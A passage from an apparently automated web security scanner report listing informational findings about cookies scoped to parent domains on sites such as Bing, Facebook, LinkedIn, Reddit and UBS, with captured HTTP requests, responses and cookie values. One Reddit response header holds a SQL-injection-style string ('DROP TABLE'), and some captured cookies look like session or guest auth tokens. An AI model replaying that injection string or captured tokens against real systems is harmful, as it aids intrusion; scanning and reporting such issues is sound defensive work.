\"TgNDVQABeU4K7F4GcysJsg==\"+ 63083+ 25140+ 4515]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuGYuIxVgFGiedPSDywKjBrND/d/YDFgtADzuWQ43k5kE+CQeLwBIvt6H5A2YLfYc2sJWHbWDDag3qa1ENmm7ltgvWA+UHbuY5DJ1+8sActef7ETLAvmc4lw3F8M0vugrRcoy6DBYMBgwQAUXTEfpOdbUyuK6Jr/TAJMEs/QRHsXgExoOfv0PbLo64kg0YMPr6OITn4PMvdCw2YU0d8LQaJz0UTvvmQBis740IAiuhPosiyJT++RRUU5Zv5gEWhlllh0GlV411cWgYmMEueW/3+HLDwLaMY1RokrL/+9Qzb67AtWAWaJfU/voYh+fAV23K4LKKKzNoJEb30/iBAFAO4yhgc="; io_freq_p1="eJzjEuboCxNglGjetPQDiwGjBZjmEudYEi/AKfF4A5CjwKDBYMBusefWErDEy3ig6qa1MAlGCzAbKHEnAihx/c4SuASYzSXMcTABKPGgrRcqwWDBwCXCsS1U4CCTxLemViRRYY4fNgJMEs/QBJeB9LecffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCACVJYIc="; segments_p1="eJwtUU1LAlEUJWcWr7ean9IP6Ce0r7W7Nv6GTFwkzcZokZUxWQRR6oxCH5KbxK9BclGUWkKghpHQEDSBpr1zaHM4nHvPPffdJ3XhFTSpi+0csPETUNidzCl8u4IyaEOJ94GjXkBq4jwk54UVNE4usp6uVJeeSg9oVtAxXVY0T2OZow4n4HsjcOcGfJ/KcRgRZT+gJqaCxvX/xI8xii1l1URNKKjAeHqH5icftTq3rTKzZiIzvCKlKNmakbYSvq6EbAh7D9DRMIGJLUyp0eMOwb1PYHFM5CuSHnh+Br7OjGfm7bD67UB5HyNvtqToZh/UWlT0ls5WEx0u85p0ZnmG+wyqLrOtR+CQb+yw54gblGLw+r/gKZ4nMgW/TANfO1AeHPAkL1HlfpEZVrAFtsmhuKZkKTpR3XiZRHnOPMfbHmOLwH6O16ceLwC/+LW7C/hD3szk9NEB5JSh6Bm72z6E2KqimSb+Z4rk7ob2B83Zo/U="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 06 Jul 2011 11:21:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 06-Jul-2011 11:21:20 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4v5hNgEniSNfFDywKjBpnZgBpA0YLMJ9LhGPiMlYBRonmTUuBsgwaDAYMFgxA0bcT2QQ4JB5vQBaV4Jg1gw2otmntUrBJTd23gCZB1M99DDLl+p0lKKasmA8S/dbUiiK65j8T0D3P0ER7F4DMbjn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE775kAYrO+NCAIroT6LIsiU/vkUVFOWb+YBFoZZZYdBpVeNdXFoGJjBLnlv9/hyw8C2jGNUaJKy//vUM2+uwLVgFmiX1P76GIfnwFdtyuCyiiszaCRG99P4gQBQCc9nZ9"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4mCDAJHGk6+IHFgVGjSNrr31gMWC0APO5hDn6wgQYJZo3LQVKMmgwGDBYMAAFl8QLcEo83oAq+DIeqLJpLargnQig4PU7S5AERTi2hQocZJL41tSKovSHDdAZz9AElyUA9becffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCADwQWy8="; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
6.13. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
6.14. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 148
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1309951245; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2FDEEE3741EE47F7B94DEA42819A0D90; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=NOFORM; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=026636356BC841D79F1AE4DB11B04388; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3fscope%3dweb%26mkt%3den-US">here</a>.</h2>
</body></html>
6.15. http://www.burstnet.com/enlightn/7111//82F1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7111//82F1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7111//82F1/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^186.1DzU^1As.1EWG^13V.1EXA

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Wed, 06 Jul 2011 14:00:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EXA^13v.1EZU; path=/; expires=Fri, 06-Jul-2012 14:00:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
6.16. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
6.17. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.163.35
X-Cnection: close
Date: Wed, 06 Jul 2011 11:15:22 GMT
Content-Length: 0

6.18. http://www.fark.com/cgi/farkit.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
6.19. http://www.google.com/bookmarks/mark  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /bookmarks/mark

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmarks/mark HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: https://www.google.com/bookmarks/mark
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1309961256:S=OFu8ed6ChCeuzoxj; expires=Fri, 05-Jul-2013 14:07:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:07:36 GMT
Server: Search-History HTTP Server
Content-Length: 234
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.google.com/bookmarks
...[SNIP]...
6.20. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:93DIfn6pEjjvFpbrPCwqLaeaMjj-1DOra9DURRE1_gdw92SrsI2wg9:1309951282:71f9fdf64b90fac7cb9339589e3ed534ca703d1e"; Version=1; Max-Age=1799; Expires=Wed, 06-Jul-2011 11:51:21 GMT; Path=/
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1274968938822400364"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: bcookie="v=1&96d058ca-285d-4b2d-96c8-f61d525270fc"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 11:21:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Wed, 06-Jul-2011 11:53:13 GMT;path=/;httponly
Content-Length: 8493

<!DOCTYPE html>
<html lang="en">
<head>


<script type="text/jav
...[SNIP]...
6.21. http://www.newsvine.com/_tools/seed&save  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/seed&save

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/seed&save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 11:20:51 GMT
Server: Apache/2.2.16 (Debian)
Set-Cookie: vid=3f48247f336bc03315b1da835fb52d70; expires=Tue, 01-Jul-2031 11:20:51 GMT; path=/; domain=.newsvine.com
Location: /_nv/accounts/login?redirect=https%3A%2F%2Fwww.newsvine.com%2F_tools%2Fseed%26save
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

6.22. http://www.reddit.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /submit

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /submit HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.reddit.com/login?dest=%2Fsubmit
Set-Cookie: reddit_first=%7B%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/
Server: '; DROP TABLE servertypes; --
Content-Length: 0
Date: Wed, 06 Jul 2011 13:56:58 GMT
Connection: close

6.23. http://www.tudou.com/v/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...
6.24. http://www.ubs.com/1/live/homepage/global/sprite_e.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/global/sprite_e.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/global/sprite_e.css HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb66276.8526e51f; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:07:20 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3158

#mainNav ul.level_1 li a.mainNav1{height:28px;display:block;width:117px;background:url(/1/live/homepage/global/navsprite_e.gif) no-repeat top left}
#mainNav ul.level_1 li a.mainNav2{height:28px;displ
...[SNIP]...
6.25. http://www.ubs.com/1/live/homepage/shared/icon_arrow_right_white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/icon_arrow_right_white.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/icon_arrow_right_white.gif HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb662d7.8526e522; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:11:46 GMT
Cache-Control: max-age=1882
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 145

GIF89a......................................vl...............!.......,..........>0.I.U8........H..v..V.d...(cA.. ..!.`(.}.H..`.....R..rnT....&".;
6.26. http://www.ubs.com/1/live/homepage/shared/index.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/index.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/index.css HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb6627c.8526e520; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 12 Aug 2010 13:57:32 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 20437

body { background: #ffffff; padding: 21px 0 20px 0 ; margin:0; font-family:Arial,Helvetica,sans-serif;}
* {margin:0;padding:0;}
div, p, td, th, textarea, input{font-family:Arial,Helvetica,sans-seri
...[SNIP]...
6.27. http://www.ubs.com/1/live/homepage/shared/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/logo.gif HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb662cd.8526e521; Domain=ubs.com; Path=/; Version=1; HttpOnly
